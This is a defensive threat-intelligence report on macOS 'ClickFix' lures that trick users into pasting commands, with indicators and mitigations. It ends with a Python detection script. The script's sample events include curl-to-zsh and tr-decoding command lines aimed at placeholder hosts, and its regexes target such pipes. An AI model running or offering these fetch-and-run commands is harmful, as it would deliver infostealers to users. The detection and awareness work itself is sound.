Full Report
Overview
The "ClickFix" threat landscape has undergone a significant architectural shift, transitioning from legacy Windows-based execution to sophisticated macOS-targeted campaigns. These operations prioritize social engineering over software vulnerability exploitation, systematically leveraging established user behaviors and professional workflows. By presenting deceptive "fixes," "verifications," or installation prompts, adversaries induce users to manually execute malicious scripts via native utilities such as the Terminal or Script Editor. This methodology effectively bypasses macOS Gatekeeper protections, facilitating the direct delivery of high-impact infostealers, including AMOS (Atomic Stealer), Cuckoo Stealer, and SHub Stealer, into the target environment.
Analysis Summary
# Tool/Technique: ClickFix (macOS Variant)
## Overview
ClickFix is a sophisticated social engineering technique that has transitioned from Windows environments to target macOS users. The campaign bypasses technical security controls like macOS Gatekeeper not through software vulnerabilities, but by inducing users to manually execute malicious commands. It leverages high-fidelity deceptive interfaces (fake CAPTCHAs, technical blogs, or system "fixes") to trick users into running malicious scripts via native utilities like Terminal or Script Editor.
## Technical Details
- **Type**: Social Engineering Technique / Malware Delivery Framework
- **Platform**: macOS
- **Capabilities**: Gatekeeper bypass, credential harvesting, cryptocurrency theft, system exfiltration, memory-resident execution.
- **First Seen**: June 2024 (Current macOS-specific iteration)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1566.002 - Phishing: Spearphishing Link]
- **[TA0002 - Execution]**
  - [T1059.002 - Command and Scripting Interpreter: AppleScript]
  - [T1059.004 - Command and Scripting Interpreter: Unix Shell]
  - [T1204.002 - User Execution: Malicious File]
- **[TA0005 - Defense Evasion]**
  - [T1553.001 - Subvert Trust Controls: Gatekeeper Bypass]
  - [T1027 - Obfuscated Files or Information]
- **[TA0006 - Credential Access]**
  - [T1555 - Credentials from Password Stores]
- **[TA0010 - Exfiltration]**
  - [T1041 - Exfiltration Over C2 Channel]
## Functionality
### Core Capabilities
- **Workflow Imitation**: Mimics standard developer/admin actions, such as using `curl | zsh` or `Homebrew` installation commands.
- **Native Utility Interfacing**: Uses the `applescript://` URL scheme to automatically trigger the macOS Script Editor.
- **Credential Harvesting**: Employs fake native-looking macOS password prompts to capture administrative credentials.
- **Memory-Resident Execution**: Uses `curl` piped to `zsh` with `tr` decoding to avoid writing malicious payloads to the disk.
### Advanced Features
- **Exploitation of Trust**: Uses typosquatted domains (e.g., `homabrews[.]org`) and compromised Ghost CMS infrastructure (CVE-2026-26980) to host loaders.
- **Locale Filtering**: Implements checks to avoid executing on machines located in CIS (Commonwealth of Independent States) countries.
- **Multi-Payload Support**: Acts as a delivery mechanism for various stealers including AMOS, Cuckoo, and SHub.
## Indicators of Compromise
- **File Names**: `Script Editor`, `Terminal` (misused native apps)
- **Network Indicators**:
  - `homabrews[.]org`
  - `applescript://` (Protocol handler abuse)
- **Behavioral Indicators**:
  - Parent process `Browser` (Chrome/Safari) spawning `Terminal` or `Script Editor`.
  - Commands involving `curl` piped directly into `sh`, `zsh`, or `python`.
  - Unexpected use of the `tr` utility to decode long strings in the command line.
## Associated Threat Actors
- Multiple competing threat groups (unnamed in report)
- Sapphire Sleet (Related targeting patterns)
## Detection Methods
- **Behavioral Detection**: Monitor for web browsers initiating `Terminal.app` or `Script Editor.app`. Identify `curl` or `wget` commands that pipe content directly into a shell interpreter.
- **Signature-based**: Detection of known infostealer payloads (AMOS, Cuckoo) once written to disk or during memory injection.
- **Network Monitoring**: Flagging traffic to known typosquatted domains mimicking popular macOS developer tools.
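The behavioral indicators above (browser spawning a scripting utility, `curl`/`wget` piped into an interpreter, a `tr` decoding stage feeding a shell) can be turned into a small triage rule over endpoint process events. The following is an added example written for this summary, not code from the report; the event tuples and hostnames are constructed, and the parent/child app names are assumed to match what an EDR agent records.

```python
import re

# Process events as an endpoint agent would record them: (parent, child, command line).
# All five events are constructed for this example; none come from the report.
SAMPLE_EVENTS = [
    ("Google Chrome", "Terminal", "curl -fsSL https://example.invalid/install.sh | zsh"),
    ("Safari", "Script Editor", "osascript -e 'display dialog \"Verification complete\"'"),
    ("Terminal", "zsh", "echo 'UJDKQWERTYPLMNBVCXZASDFGHJKLQWERTYUIOPZXCV' | tr 'A-Z' 'a-z' | zsh"),
    ("Finder", "Terminal", "ls -la"),
    ("Terminal", "zsh", "curl -s https://example.invalid/get | tr a-z n-za-m | zsh"),
]

BROWSERS = {"Google Chrome", "Safari", "Firefox", "Microsoft Edge", "Arc"}  # assumed process names
SCRIPTING_UTILITIES = {"Terminal", "Script Editor"}

# curl/wget output that ends up in a shell or Python interpreter, possibly via intermediate stages.
DOWNLOAD_TO_INTERPRETER = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sudo\s+)?(?:sh|bash|zsh|python3?)\b")
# A tr stage whose output feeds a shell: the in-pipeline decoding pattern the report describes.
TR_TO_SHELL = re.compile(r"\|\s*tr\s+[^|]+\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b")


def classify(parent, child, cmdline):
    """Return the report's behavioral indicators that a single process event matches."""
    hits = []
    if parent in BROWSERS and child in SCRIPTING_UTILITIES:
        hits.append("browser_spawned_scripting_utility")
    if DOWNLOAD_TO_INTERPRETER.search(cmdline):
        hits.append("download_piped_to_interpreter")
    if TR_TO_SHELL.search(cmdline):
        hits.append("tr_decode_to_shell")
    return hits


def scan_events(events):
    """Run classify() over every event and keep only those that triggered at least one indicator."""
    alerts = []
    for parent, child, cmdline in events:
        indicators = classify(parent, child, cmdline)
        if indicators:
            alerts.append({"parent": parent, "child": child, "indicators": indicators, "cmdline": cmdline})
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"[{', '.join(alert['indicators'])}] {alert['parent']} -> {alert['child']}: {alert['cmdline']}")
```

Only the plain `ls -la` event is left unflagged; the Safari dialog event is still raised because a browser launching Script Editor is itself the first indicator, regardless of what the script then does.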
## Mitigation Strategies
- **Prevention**: User awareness training focusing on the danger of "Copy-Paste" commands from websites into the Terminal.
- **Hardening**: Restrict use of `AppleScript` and `Terminal` via MDM profiles where not required for business functions.
- **Administrative Hygiene**: Treat any prompt for administrative credentials that appears immediately after a web-based action as highly suspicious.
## Related Tools/Techniques
- **AMOS (Atomic Stealer)**: Frequently delivered payload.
- **Cuckoo Stealer**: Frequently delivered payload.
- **SHub Stealer**: Targeted infostealer for digital assets.
- **Ghost CMS SQLi**: Used for infrastructure compromise to host the ClickFix lures.